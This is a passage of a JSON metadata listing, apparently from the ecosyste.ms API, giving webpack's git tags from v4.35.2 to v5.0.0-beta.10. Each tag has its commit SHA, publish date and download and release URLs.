ebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://githu